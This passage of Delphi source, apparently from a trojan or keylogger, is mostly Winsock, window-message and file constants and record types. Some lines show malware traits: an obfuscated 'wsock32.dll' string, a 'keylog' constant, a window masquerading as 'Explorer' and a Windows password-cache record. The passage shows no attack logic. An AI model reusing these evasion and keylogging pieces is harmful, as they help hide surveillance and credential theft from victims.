} // AF_IMPLINK = 3; { arpanet imp addresses } // AF_PUP = 4; { pup protocols: e.g. BSP } // AF_CHAOS = 5; { mit CHAOS protocols } // AF_IPX = 6; { IPX and SPX } // AF_NS = 6; { XEROX NS protocols } // AF_ISO = 7; { ISO protocols } // AF_OSI = AF_ISO; { OSI is ISO } // AF_ECMA = 8; { european computer manufacturers } // AF_DATAKIT = 9; { datakit protocols } // AF_CCITT = 10; { CCITT protocols, X.25 etc } // AF_SNA = 11; { IBM SNA } // AF_DECnet = 12; { DECnet } // AF_DLI = 13; { Direct data link interface } // AF_LAT = 14; { LAT } // AF_HYLINK = 15; { NSC Hyperchannel } // AF_APPLETALK = 16; { AppleTalk } // AF_NETBIOS = 17; { NetBios-style addresses } // AF_VOICEVIEW = 18; { VoiceView } // AF_FIREFOX = 19; { FireFox } // AF_UNKNOWN1 = 20; { Somebody is using this! } // AF_BAN = 21; { Banyan } // AF_MAX = 22; // PF_UNSPEC = AF_UNSPEC; PF_UNIX = AF_UNIX; PF_INET = AF_INET; // PF_IMPLINK = AF_IMPLINK; // PF_PUP = AF_PUP; // PF_CHAOS = AF_CHAOS; // PF_NS = AF_NS; // PF_IPX = AF_IPX; // PF_ISO = AF_ISO; // PF_OSI = AF_OSI; // PF_ECMA = AF_ECMA; // PF_DATAKIT = AF_DATAKIT; // PF_CCITT = AF_CCITT; // PF_SNA = AF_SNA; // PF_DECnet = AF_DECnet; // PF_DLI = AF_DLI; // PF_LAT = AF_LAT; // PF_HYLINK = AF_HYLINK; // PF_APPLETALK = AF_APPLETALK; // PF_VOICEVIEW = AF_VOICEVIEW; // PF_FIREFOX = AF_FIREFOX; // PF_UNKNOWN1 = AF_UNKNOWN1; // PF_BAN = AF_BAN; // PF_MAX = AF_MAX; SOL_SOCKET = $ffff; {options for socket level } SOMAXCONN = 5;{ Maximum queue length specifiable by listen. 
} MSG_OOB = $1; {process out-of-band data } MSG_PEEK = $2; {peek at incoming message } MSG_DONTROUTE = $4; {send without using routing tables } MSG_MAXIOVLEN = 16; MSG_PARTIAL = $8000; {partial send or recv for message xport } MAXGETHOSTSTRUCT = 1024; FD_READ = $01; FD_WRITE = $02; FD_OOB = $04; FD_ACCEPT = $08; FD_CONNECT = $10; FD_CLOSE = $20; WSABASEERR = 10000; WSAEINTR = (WSABASEERR+4); WSAEBADF = (WSABASEERR+9); WSAEACCES = (WSABASEERR+13); WSAEFAULT = (WSABASEERR+14); WSAEINVAL = (WSABASEERR+22); WSAEMFILE = (WSABASEERR+24); WSAEWOULDBLOCK = (WSABASEERR+35); WSAEINPROGRESS = (WSABASEERR+36); WSAEALREADY = (WSABASEERR+37); WSAENOTSOCK = (WSABASEERR+38); WSAEDESTADDRREQ = (WSABASEERR+39); WSAEMSGSIZE = (WSABASEERR+40); WSAEPROTOTYPE = (WSABASEERR+41); WSAENOPROTOOPT = (WSABASEERR+42); WSAEPROTONOSUPPORT = (WSABASEERR+43); WSAESOCKTNOSUPPORT = (WSABASEERR+44); WSAEOPNOTSUPP = (WSABASEERR+45); WSAEPFNOSUPPORT = (WSABASEERR+46); WSAEAFNOSUPPORT = (WSABASEERR+47); WSAEADDRINUSE = (WSABASEERR+48); WSAEADDRNOTAVAIL = (WSABASEERR+49); WSAENETDOWN = (WSABASEERR+50); WSAENETUNREACH = (WSABASEERR+51); WSAENETRESET = (WSABASEERR+52); WSAECONNABORTED = (WSABASEERR+53); WSAECONNRESET = (WSABASEERR+54); WSAENOBUFS = (WSABASEERR+55); WSAEISCONN = (WSABASEERR+56); WSAENOTCONN = (WSABASEERR+57); WSAESHUTDOWN = (WSABASEERR+58); WSAETOOMANYREFS = (WSABASEERR+59); WSAETIMEDOUT = (WSABASEERR+60); WSAECONNREFUSED = (WSABASEERR+61); WSAELOOP = (WSABASEERR+62); WSAENAMETOOLONG = (WSABASEERR+63); WSAEHOSTDOWN = (WSABASEERR+64); WSAEHOSTUNREACH = (WSABASEERR+65); WSAENOTEMPTY = (WSABASEERR+66); WSAEPROCLIM = (WSABASEERR+67); WSAEUSERS = (WSABASEERR+68); WSAEDQUOT = (WSABASEERR+69); WSAESTALE = (WSABASEERR+70); WSAEREMOTE = (WSABASEERR+71); WSAEDISCON = (WSABASEERR+101); WSASYSNOTREADY = (WSABASEERR+91); WSAVERNOTSUPPORTED = (WSABASEERR+92); WSANOTINITIALISED = (WSABASEERR+93); WSAHOST_NOT_FOUND = (WSABASEERR+1001); HOST_NOT_FOUND = WSAHOST_NOT_FOUND; WSATRY_AGAIN = (WSABASEERR+1002); 
TRY_AGAIN = WSATRY_AGAIN; WSANO_RECOVERY = (WSABASEERR+1003); NO_RECOVERY = WSANO_RECOVERY; WSANO_DATA = (WSABASEERR+1004); NO_DATA = WSANO_DATA; WSANO_ADDRESS = WSANO_DATA; NO_ADDRESS = WSANO_ADDRESS; EWOULDBLOCK = WSAEWOULDBLOCK; EINPROGRESS = WSAEINPROGRESS; EALREADY = WSAEALREADY; ENOTSOCK = WSAENOTSOCK; EDESTADDRREQ = WSAEDESTADDRREQ; EMSGSIZE = WSAEMSGSIZE; EPROTOTYPE = WSAEPROTOTYPE; ENOPROTOOPT = WSAENOPROTOOPT; EPROTONOSUPPORT = WSAEPROTONOSUPPORT; ESOCKTNOSUPPORT = WSAESOCKTNOSUPPORT; EOPNOTSUPP = WSAEOPNOTSUPP; EPFNOSUPPORT = WSAEPFNOSUPPORT; EAFNOSUPPORT = WSAEAFNOSUPPORT; EADDRINUSE = WSAEADDRINUSE; EADDRNOTAVAIL = WSAEADDRNOTAVAIL; ENETDOWN = WSAENETDOWN; ENETUNREACH = WSAENETUNREACH; ENETRESET = WSAENETRESET; ECONNABORTED = WSAECONNABORTED; ECONNRESET = WSAECONNRESET; ENOBUFS = WSAENOBUFS; EISCONN = WSAEISCONN; ENOTCONN = WSAENOTCONN; ESHUTDOWN = WSAESHUTDOWN; ETOOMANYREFS = WSAETOOMANYREFS; ETIMEDOUT = WSAETIMEDOUT; ECONNREFUSED = WSAECONNREFUSED; ELOOP = WSAELOOP; ENAMETOOLONG = WSAENAMETOOLONG; EHOSTDOWN = WSAEHOSTDOWN; EHOSTUNREACH = WSAEHOSTUNREACH; ENOTEMPTY = WSAENOTEMPTY; EPROCLIM = WSAEPROCLIM; EUSERS = WSAEUSERS; EDQUOT = WSAEDQUOT; ESTALE = WSAESTALE; EREMOTE = WSAEREMOTE; winsocket = 'vqlgn55&mfg'; //wsock32.dll {messages windows const} WM_NULL = $0000; WM_CREATE = $0001; WM_DESTROY = $0002; WM_MOVE = $0003; WM_SIZE = $0005; WM_ACTIVATE = $0006; WM_SETFOCUS = $0007; WM_KILLFOCUS = $0008; WM_ENABLE = $000A; WM_SETREDRAW = $000B; WM_SETTEXT = $000C; WM_GETTEXT = $000D; WM_GETTEXTLENGTH = $000E; WM_PAINT = $000F; WM_CLOSE = $0010; WM_QUERYENDSESSION = $0011; WM_QUIT = $0012; WM_QUERYOPEN = $0013; WM_ERASEBKGND = $0014; WM_SYSCOLORCHANGE = $0015; WM_ENDSESSION = $0016; WM_SYSTEMERROR = $0017; WM_SHOWWINDOW = $0018; WM_CTLCOLOR = $0019; WM_WININICHANGE = $001A; WM_SETTINGCHANGE = WM_WININICHANGE; WM_DEVMODECHANGE = $001B; WM_ACTIVATEAPP = $001C; WM_FONTCHANGE = $001D; WM_TIMECHANGE = $001E; WM_CANCELMODE = $001F; WM_SETCURSOR = $0020; 
WM_MOUSEACTIVATE = $0021; WM_CHILDACTIVATE = $0022; WM_QUEUESYNC = $0023; WM_GETMINMAXINFO = $0024; WM_PAINTICON = $0026; WM_ICONERASEBKGND = $0027; WM_NEXTDLGCTL = $0028; WM_SPOOLERSTATUS = $002A; WM_DRAWITEM = $002B; WM_MEASUREITEM = $002C; WM_DELETEITEM = $002D; WM_VKEYTOITEM = $002E; WM_CHARTOITEM = $002F; WM_SETFONT = $0030; WM_GETFONT = $0031; WM_QUERYDRAGICON = $0037; WM_COMPAREITEM = $0039; WM_COMPACTING = $0041; WM_COMMNOTIFY = $0044; { obsolete in Win32} WM_WINDOWPOSCHANGING = $0046; WM_WINDOWPOSCHANGED = $0047; WM_POWER = $0048; WM_COPYDATA = $004A; WM_CANCELJOURNAL = $004B; WM_NOTIFY = $004E; WM_INPUTLANGCHANGEREQUEST = $0050; WM_INPUTLANGCHANGE = $0051; WM_TCARD = $0052; WM_HELP = $0053; WM_USERCHANGED = $0054; WM_NOTIFYFORMAT = $0055; WM_CONTEXTMENU = $007B; WM_STYLECHANGING = $007C; WM_STYLECHANGED = $007D; WM_DISPLAYCHANGE = $007E; WM_GETICON = $007F; WM_SETICON = $0080; WM_NCCREATE = $0081; WM_NCDESTROY = $0082; WM_NCCALCSIZE = $0083; WM_NCHITTEST = $0084; WM_NCPAINT = $0085; WM_NCACTIVATE = $0086; WM_GETDLGCODE = $0087; WM_NCMOUSEMOVE = $00A0; { WM_NCLBUTTONDOWN = $00A1; WM_NCLBUTTONUP = $00A2; WM_NCLBUTTONDBLCLK = $00A3; WM_NCRBUTTONDOWN = $00A4; WM_NCRBUTTONUP = $00A5; WM_NCRBUTTONDBLCLK = $00A6; WM_NCMBUTTONDOWN = $00A7; WM_NCMBUTTONUP = $00A8; WM_NCMBUTTONDBLCLK = $00A9; } WM_KEYFIRST = $0100; WM_KEYDOWN = $0100; WM_KEYUP = $0101; WM_CHAR = $0102; WM_DEADCHAR = $0103; WM_SYSKEYDOWN = $0104; WM_SYSKEYUP = $0105; WM_SYSCHAR = $0106; WM_SYSDEADCHAR = $0107; WM_KEYLAST = $0108; WM_INITDIALOG = $0110; WM_COMMAND = $0111; WM_SYSCOMMAND = $0112; WM_TIMER = $0113; WM_HSCROLL = $0114; WM_VSCROLL = $0115; WM_INITMENU = $0116; WM_INITMENUPOPUP = $0117; WM_MENUSELECT = $011F; WM_MENUCHAR = $0120; WM_ENTERIDLE = $0121; WM_CTLCOLORMSGBOX = $0132; WM_CTLCOLOREDIT = $0133; WM_CTLCOLORLISTBOX = $0134; WM_CTLCOLORBTN = $0135; WM_CTLCOLORDLG = $0136; WM_CTLCOLORSCROLLBAR= $0137; WM_CTLCOLORSTATIC = $0138; WM_MOUSEFIRST = $0200; WM_MOUSEMOVE = $0200; 
WM_LBUTTONDOWN = $0201; WM_LBUTTONUP = $0202; WM_LBUTTONDBLCLK = $0203; WM_RBUTTONDOWN = $0204; WM_RBUTTONUP = $0205; WM_RBUTTONDBLCLK = $0206; WM_MBUTTONDOWN = $0207; WM_MBUTTONUP = $0208; WM_MBUTTONDBLCLK = $0209; WM_MOUSEWHEEL = $020A; WM_MOUSELAST = $020A; WM_PARENTNOTIFY = $0210; WM_ENTERMENULOOP = $0211; WM_EXITMENULOOP = $0212; WM_NEXTMENU = $0213; WM_SIZING = 532; WM_CAPTURECHANGED = 533; WM_MOVING = 534; WM_POWERBROADCAST = 536; WM_DEVICECHANGE = 537; { WM_IME_STARTCOMPOSITION = $010D; WM_IME_ENDCOMPOSITION = $010E; WM_IME_COMPOSITION = $010F; WM_IME_KEYLAST = $010F; WM_IME_SETCONTEXT = $0281; WM_IME_NOTIFY = $0282; WM_IME_CONTROL = $0283; WM_IME_COMPOSITIONFULL = $0284; WM_IME_SELECT = $0285; WM_IME_CHAR = $0286; WM_IME_KEYDOWN = $0290; WM_IME_KEYUP = $0291; WM_MDICREATE = $0220; WM_MDIDESTROY = $0221; WM_MDIACTIVATE = $0222; WM_MDIRESTORE = $0223; WM_MDINEXT = $0224; WM_MDIMAXIMIZE = $0225; WM_MDITILE = $0226; WM_MDICASCADE = $0227; WM_MDIICONARRANGE = $0228; WM_MDIGETACTIVE = $0229; WM_MDISETMENU = $0230; WM_ENTERSIZEMOVE = $0231; WM_EXITSIZEMOVE = $0232; WM_DROPFILES = $0233; WM_MDIREFRESHMENU = $0234; } WM_MOUSEHOVER = $02A1; WM_MOUSELEAVE = $02A3; WM_CUT = $0300; WM_COPY = $0301; WM_PASTE = $0302; WM_CLEAR = $0303; WM_UNDO = $0304; WM_PAINTCLIPBOARD = $0309; WM_PRINT = 791; WM_PRINTCLIENT = 792; WM_HANDHELDFIRST = 856; WM_HANDHELDLAST = 863; WM_PENWINFIRST = $0380; WM_PENWINLAST = $038F; WM_COALESCE_FIRST = $0390; WM_COALESCE_LAST = $039F; WM_DDE_FIRST = $03E0; WM_DDE_INITIATE = WM_DDE_FIRST + 0; WM_DDE_TERMINATE = WM_DDE_FIRST + 1; WM_DDE_ADVISE = WM_DDE_FIRST + 2; WM_DDE_UNADVISE = WM_DDE_FIRST + 3; WM_DDE_ACK = WM_DDE_FIRST + 4; WM_DDE_DATA = WM_DDE_FIRST + 5; WM_DDE_REQUEST = WM_DDE_FIRST + 6; WM_DDE_POKE = WM_DDE_FIRST + 7; WM_DDE_EXECUTE = WM_DDE_FIRST + 8; WM_DDE_LAST = WM_DDE_FIRST + 8; WM_APP = $8000; WM_USER = $0400; UM_KEYHIT = WM_USER + 7; //keylog const ERROR = '|ERROR:'; ALLDONE = 'All done.'; //VER_PLATFORM_WIN32s = 0; 
//V/ER_PLATFORM_WIN32_WINDOWS = 1; //VER_PLATFORM_WIN32_NT = 2; Count : integer = 0; lpzClassName = 'Explorer '; lpzWindowsName = 'Explorer '; WM_MY_SOCK_MESSAGE = WM_USER+2; LFCR = #10#13; { File open modes } fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000; fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030; fmShareDenyNone = $0040; { File attribute constants } faReadOnly = $00000001; faHidden = $00000002; faSysFile = $00000004; faVolumeID = $00000008; faDirectory = $00000010; faArchive = $00000020; faAnyFile = $0000003F; {prog type} type PWinPassword = ^TWinPassword; TWinPassword = record EntrySize: Word; ResourceSize: Word; PasswordSize: Word; EntryIndex: Byte; EntryType: Byte; PasswordC: Char; end; {winsock type} type u_char = Char; u_short = Word; u_int = Integer; u_long = Longint; TSocket = u_int; type PFDSet = ^TFDSet; TFDSet = packed record fd_count: u_int; fd_array: array[0..FD_SETSIZE-1] of TSocket; end; PTimeVal = ^TTimeVal; TTimeVal = packed record tv_sec: Longint; tv_usec: Longint; end; type PHostEnt = ^THostEnt; THostEnt = packed record h_name: PChar; h_aliases: ^PChar; h_addrtype: Smallint; h_length: Smallint; case Byte of 0: (h_addr_list: ^PChar); 1: (h_addr: ^PChar) end; PNetEnt = ^TNetEnt; TNetEnt = packed record n_name: PChar; n_aliases: ^PChar; n_addrtype: Smallint; n_net: u_long; end; PServEnt = ^TServEnt; TServEnt = packed record s_name: PChar; s_aliases: ^PChar; s_port: Smallint; s_proto: PChar; end; PProtoEnt = ^TProtoEnt; TProtoEnt = packed record p_name: PChar; p_aliases: ^Pchar; p_proto: Smallint; end; type SunB = packed record s_b1, s_b2, s_b3, s_b4: u_char; end; SunW = packed record s_w1, s_w2: u_short; end; PInAddr = ^TInAddr; TInAddr = packed record case integer of 0: (S_un_b: SunB); 1: (S_un_w: SunW); 2: (S_addr: u_long); end; PSockAddrIn = ^TSockAddrIn; TSockAddrIn = packed record case Integer of 0: (sin_family: u_short; sin_port: u_short; sin_addr: TInAddr; sin_zero: 
array[0..7] of Char); 1: (sa_family: u_short; sa_data: array[0..13] of Char) end; type PWSAData = ^TWSAData; TWSAData = packed record wVersion: Word; wHighVersion: Word; szDescription: array[0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; PTransmitFileBuffers = ^TTransmitFileBuffers; TTransmitFileBuffers = packed record Head: Pointer; HeadLength: DWORD; Tail: Pointer; TailLength: DWORD; end; type { Structure used by kernel to store most addresses. } PSockAddr = ^TSockAddr; TSockAddr = TSockAddrIn; { Structure used by kernel to pass protocol information in raw sockets. } PSockProto = ^TSockProto; TSockProto = packed record sp_family: u_short; sp_protocol: u_short; end; type { Structure used for manipulating linger option. } PLinger = ^TLinger; TLinger = packed record l_onoff: u_short; l_linger: u_short; end; const INVALID_SOCKET = TSocket(NOT(0)); SOCKET_ERROR = -1; {type window message record} type PMessage = ^TMessage; TMessage = record Msg: Cardinal; case Integer of 0: ( WParam: Longint; LParam: Longint; Result: Longint); 1: ( WParamLo: Word; WParamHi: Word; LParamLo: Word; LParamHi: Word; ResultLo: Word; ResultHi: Word); end; { Common message format records } TWMNoParams = record Msg: Cardinal; Unused: array[0..3] of Word; Result: Longint; end; TWMKey = record Msg: Cardinal; CharCode: Word; Unused: Word; KeyData: Longint; Result: Longint; end; TWMMouse = record Msg: Cardinal; Keys: Longint; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMWindowPosMsg = record Msg: Cardinal; Unused: Integer; WindowPos: PWindowPos; Result: Longint; end; TWMScroll = record Msg: Cardinal; ScrollCode: Smallint; { SB_xxxx } Pos: Smallint; ScrollBar: HWND; Result: Longint; end; { Message records } TWMActivate = record Msg: Cardinal; Active: Word; { WA_INACTIVE, WA_ACTIVE, WA_CLICKACTIVE } Minimized: WordBool; ActiveWindow: HWND; 
    Result: Longint;
  end;

  TWMActivateApp = record
    Msg: Cardinal;
    Active: BOOL;
    ThreadId: Longint;
    Result: Longint;
  end;

  TWMAskCBFormatName = record
    Msg: Cardinal;
    NameLen: Word;
    Unused: Word;
    FormatName: PChar;
    Result: Longint;
  end;

  TWMCancelMode = TWMNoParams;

  TWMChangeCBChain = record
    Msg: Cardinal;
    Remove: HWND;
    Next: HWND;
    Result: Longint;
  end;

  TWMChar = TWMKey;

  TWMCharToItem = record
    Msg: Cardinal;
    Key: Word;
    CaretPos: Word;
    ListBox: HWND;
    Result: Longint;
  end;

  TWMChildActivate = TWMNoParams;

  TWMChooseFont_GetLogFont = record
    Msg: Cardinal;
    Unused: Longint;
    LogFont: PLogFont;
    Result: Longint;
  end;

  TWMClear = TWMNoParams;
  TWMClose = TWMNoParams;

  TWMCommand = record
    Msg: Cardinal;
    ItemID: Word;
    NotifyCode: Word;
    Ctl: HWND;
    Result: Longint;
  end;

  TWMCompacting = record
    Msg: Cardinal;
    CompactRatio: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMCompareItem = record
    Msg: Cardinal;
    Ctl: HWnd;
    CompareItemStruct: PCompareItemStruct;
    Result: Longint;
  end;

  TWMCopy = TWMNoParams;

  TWMCopyData = record
    Msg: Cardinal;
    From: HWND;
    CopyDataStruct: PCopyDataStruct;
    Result: Longint;
  end;

  { ?? WM_CLP_LAUNCH, WM_CPL_LAUNCHED }

  TWMCreate = record
    Msg: Cardinal;
    Unused: Integer;
    CreateStruct: PCreateStruct;
    Result: Longint;
  end;

  TWMCtlColor = record
    Msg: Cardinal;
    ChildDC: HDC;
    ChildWnd: HWND;
    Result: Longint;
  end;

  TWMCtlColorBtn = TWMCtlColor;
  TWMCtlColorDlg = TWMCtlColor;
  TWMCtlColorEdit = TWMCtlColor;
  TWMCtlColorListbox = TWMCtlColor;
  TWMCtlColorMsgbox = TWMCtlColor;
  TWMCtlColorScrollbar = TWMCtlColor;
  TWMCtlColorStatic = TWMCtlColor;

  TWMCut = TWMNoParams;

  TWMDDE_Ack = record
    Msg: Cardinal;
    PostingApp: HWND;
    case Word of
      WM_DDE_INITIATE: (
        App: Word;
        Topic: Word;
        Result: Longint);
      WM_DDE_EXECUTE {and all others}: (
        PackedVal: Longint);
  end;

  TWMDDE_Advise = record
    Msg: Cardinal;
    PostingApp: HWND;
    PackedVal: Longint;
    Result: Longint;
  end;

  TWMDDE_Data = record
    Msg: Cardinal;
    PostingApp: HWND;
    PackedVal: Longint;
    Result: Longint;
  end;

  TWMDDE_Execute = record
    Msg: Cardinal;
    PostingApp: HWND;
    Commands: THandle;
    Result: Longint;
  end;

  TWMDDE_Initiate = record
    Msg: Cardinal;
    PostingApp: HWND;
    App: Word;
    Topic: Word;
    Result: Longint;
  end;

  TWMDDE_Poke = record
    Msg: Cardinal;
    PostingApp: HWND;
    PackedVal: Longint;
    Result: Longint;
  end;

  TWMDDE_Request = record
    Msg: Cardinal;
    PostingApp: HWND;
    Format: Word;
    Item: Word;
    Result: Longint;
  end;

  TWMDDE_Terminate = record
    Msg: Cardinal;
    PostingApp: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMDDE_Unadvise = record
    Msg: Cardinal;
    PostingApp: HWND;
    Format: Word;
    Item: Word;
    Result: Longint;
  end;

  TWMDeadChar = TWMChar;

  TWMDeleteItem = record
    Msg: Cardinal;
    Ctl: HWND;
    DeleteItemStruct: PDeleteItemStruct;
    Result: Longint;
  end;

  TWMDestroy = TWMNoParams;
  TWMDestroyClipboard = TWMNoParams;

  TWMDevModeChange = record
    Msg: Cardinal;
    Unused: Integer;
    Device: PChar;
    Result: Longint;
  end;

  TWMDrawClipboard = TWMNoParams;

  { TWMDropFiles = record
    Msg: Cardinal;
    Drop: THANDLE;
    Unused: Longint;
    Result: Longint;
  end; }

  TWMEnable = record
    Msg: Cardinal;
    Enabled: LongBool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMEndSession = record
    Msg: Cardinal;
    EndSession: LongBool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMEnterIdle = record
    Msg: Cardinal;
    Source: Longint; { MSGF_DIALOGBOX, MSGF_MENU }
    IdleWnd: HWND;
    Result: Longint;
  end;

  TWMEnterMenuLoop = record
    Msg: Cardinal;
    IsTrackPopupMenu: LongBool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMExitMenuLoop = TWMEnterMenuLoop;

  TWMEraseBkgnd = record
    Msg: Cardinal;
    DC: HDC;
    Unused: Longint;
    Result: Longint;
  end;

  TWMFontChange = TWMNoParams;
  TWMGetDlgCode = TWMNoParams;
  TWMGetFont = TWMNoParams;

  TWMGetIcon = record
    Msg: Cardinal;
    BigIcon: Longbool;
    Unused: Longint;
    Result: Longint;
  end;

  TWMGetText = record
    Msg: Cardinal;
    TextMax: Integer;
    Text: PChar;
    Result: Longint;
  end;

  TWMGetTextLength = TWMNoParams;

  { TWMHotKey = record
    Msg: Cardinal;
    HotKey: Longint;
    Unused: Longint;
    Result: Longint;
  end; }

  TWMHScroll = TWMScroll;

  TWMHScrollClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    ScrollCode: Word; {SB_BOTTOM, SB_ENDSCROLL, SB_LINEDOWN, SB_LINEUP,
                       SB_PAGEDOWN, SB_PAGEUP, SB_THUMBPOSITION,
                       SB_THUMBTRACK, SB_TOP }
    Pos: Word;
    Result: Longint;
  end;

  TWMIconEraseBkgnd = TWMEraseBkgnd;

  TWMInitDialog = record
    Msg: Cardinal;
    Focus: HWND;
    InitParam: Longint;
    Result: Longint;
  end;

  TWMInitMenu = record
    Msg: Cardinal;
    Menu: HMENU;
    Unused: Longint;
    Result: Longint;
  end;

  TWMInitMenuPopup = record
    Msg: Cardinal;
    MenuPopup: HMENU;
    Pos: Smallint;
    SystemMenu: WordBool;
    Result: Longint;
  end;

  TWMKeyDown = TWMKey;
  TWMKeyUp = TWMKey;

  TWMKillFocus = record
    Msg: Cardinal;
    FocusedWnd: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMLButtonDblClk = TWMMouse;
  TWMLButtonDown = TWMMouse;
  TWMLButtonUp = TWMMouse;
  TWMMButtonDblClk = TWMMouse;
  TWMMButtonDown = TWMMouse;
  TWMMButtonUp = TWMMouse;

  TWMMDIActivate = record
    Msg: Cardinal;
    case Integer of
      0: (
        ChildWnd: HWND);
      1: (
        DeactiveWnd: HWND;
        ActiveWnd: HWND;
        Result: Longint);
  end;

  TWMMDICascade = record
    Msg: Cardinal;
    Cascade: Longint; { 0, MDITILE_SKIPDISABLED }
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDICreate = record
    Msg: Cardinal;
    Unused: Integer;
    MDICreateStruct: PMDICreateStruct;
    Result: Longint;
  end;

  TWMMDIDestroy = record
    Msg: Cardinal;
    Child: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDIGetActive = TWMNoParams;
  TWMMDIIconArrange = TWMNoParams;

  TWMMDIMaximize = record
    Msg: Cardinal;
    Maximize: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDINext = record
    Msg: Cardinal;
    Child: HWND;
    Next: Longint;
    Result: Longint;
  end;

  TWMMDIRefreshMenu = TWMNoParams;

  TWMMDIRestore = record
    Msg: Cardinal;
    IDChild: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMMDISetMenu = record
    Msg: Cardinal;
    MenuFrame: HMENU;
    MenuWindow: HMENU;
    Result: Longint;
  end;

  TWMMDITile = record
    Msg: Cardinal;
    Tile: Longint; { MDITILE_HORIZONTAL, MDITILE_SKIPDISABLE, MDITILE_VERTICAL }
    Unused: Longint;
    Result: Longint;
  end;

  TWMMenuChar = record
    Msg: Cardinal;
    User: Char;
    Unused: Byte;
    MenuFlag: Word; { MF_POPUP, MF_SYSMENU }
    Menu: HMENU;
    Result: Longint;
  end;

  TWMMenuSelect = record
    Msg: Cardinal;
    IDItem: Word;
    MenuFlag: Word; { MF_BITMAP, MF_CHECKED, MF_DISABLED, MF_GRAYED,
                      MF_MOUSESELECT, MF_OWNERDRAW, MF_POPUP, MF_SEPARATOR,
                      MF_SYSMENU }
    Menu: HMENU;
    Result: Longint;
  end;

  TWMMouseActivate = record
    Msg: Cardinal;
    TopLevel: HWND;
    HitTestCode: Word;
    MouseMsg: Word;
    Result: Longint;
  end;

  TWMMouseMove = TWMMouse;

  TWMMove = record
    Msg: Cardinal;
    Unused: Integer;
    case Integer of
      0: (
        XPos: Smallint;
        YPos: Smallint);
      1: (
        Pos: TSmallPoint;
        Result: Longint);
  end;

  TWMNCActivate = record
    Msg: Cardinal;
    Active: BOOL;
    Unused: Longint;
    Result: Longint;
  end;

  TWMNCCalcSize = record
    Msg: Cardinal;
    CalcValidRects: BOOL;
    CalcSize_Params: PNCCalcSizeParams;
    Result: Longint;
  end;

  TWMNCCreate = record
    Msg: Cardinal;
    Unused: Integer;
    CreateStruct: PCreateStruct;
    Result: Longint;
  end;

  TWMNCDestroy = TWMNoParams;

  TWMNCHitTest = record
    Msg: Cardinal;
    Unused: Longint;
    case Integer of
      0: (
        XPos: Smallint;
        YPos: Smallint);
      1: (
        Pos: TSmallPoint;
        Result: Longint);
  end;

  TWMNCHitMessage = record
    Msg: Cardinal;
    HitTest: Longint;
    XCursor: Smallint;
    YCursor: Smallint;
    Result: Longint;
  end;

  TWMNCLButtonDblClk = TWMNCHitMessage;
  TWMNCLButtonDown = TWMNCHitMessage;
  TWMNCLButtonUp = TWMNCHitMessage;
  TWMNCMButtonDblClk = TWMNCHitMessage;
  TWMNCMButtonDown = TWMNCHitMessage;
  TWMNCMButtonUp = TWMNCHitMessage;
  TWMNCMouseMove = TWMNCHitMessage;

  TWMNCPaint = TWMNoParams;

  TWMNCRButtonDblClk = TWMNCHitMessage;
  TWMNCRButtonDown = TWMNCHitMessage;
  TWMNCRButtonUp = TWMNCHitMessage;

  TWMNextDlgCtl = record
    Msg: Cardinal;
    CtlFocus: Longint;
    Handle: WordBool;
    Unused: Word;
    Result: Longint;
  end;

  TWMNotify = record
    Msg: Cardinal;
    IDCtrl: Longint;
    NMHdr: PNMHdr;
    Result: Longint;
  end;

  TWMNotifyFormat = record
    Msg: Cardinal;
    From: HWND;
    Command: Longint;
    Result: Longint;
  end;

  TWMPaint = record
    Msg: Cardinal;
    DC: HDC;
    Unused: Longint;
    Result: Longint;
  end;

  TWMPaintClipboard = record
    Msg: Cardinal;
    Viewer: HWND;
    PaintStruct: THandle;
    Result: Longint;
  end;

  TWMPaintIcon = TWMNoParams;

  TWMPaletteChanged = record
    Msg: Cardinal;
    PalChg: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMPaletteIsChanging = record
    Msg: Cardinal;
    Realize: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMParentNotify = record
    Msg: Cardinal;
    case Event: Word of
      WM_CREATE, WM_DESTROY: (
        ChildID: Word;
        ChildWnd: HWnd);
      WM_LBUTTONDOWN, WM_MBUTTONDOWN, WM_RBUTTONDOWN: (
        Value: Word;
        XPos: Smallint;
        YPos: Smallint);
      0: (
        Value1: Word;
        Value2: Longint;
        Result: Longint);
  end;

  TWMPaste = TWMNoParams;

  TWMPower = record
    Msg: Cardinal;
    PowerEvt: Longint; { PWR_SUSPENDREQUEST, PWR_SUSPENDRESUME, PWR_CRITICALRESUME }
    Unused: Longint;
    Result: Longint;
  end;

  TWMQueryDragIcon = TWMNoParams;

  TWMQueryEndSession = record
    Msg: Cardinal;
    Source: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMQueryNewPalette = TWMNoParams;
  TWMQueryOpen = TWMNoParams;
  TWMQueueSync = TWMNoParams;

  TWMQuit = record
    Msg: Cardinal;
    ExitCode: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMRButtonDblClk = TWMMouse;
  TWMRButtonDown = TWMMouse;
  TWMRButtonUp = TWMMouse;

  TWMRenderAllFormats = TWMNoParams;

  TWMRenderFormat = record
    Msg: Cardinal;
    Format: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMSetCursor = record
    Msg: Cardinal;
    CursorWnd: HWND;
    HitTest: Word;
    MouseMsg: Word;
    Result: Longint;
  end;

  TWMSetFocus = record
    Msg: Cardinal;
    FocusedWnd: HWND;
    Unused: Longint;
    Result: Longint;
  end;

  TWMSetFont = record
    Msg: Cardinal;
    Font: HFONT;
    Redraw: WordBool;
    Unused: Word;
    Result: Longint;
  end;

  TWMSetIcon = record
    Msg: Cardinal;
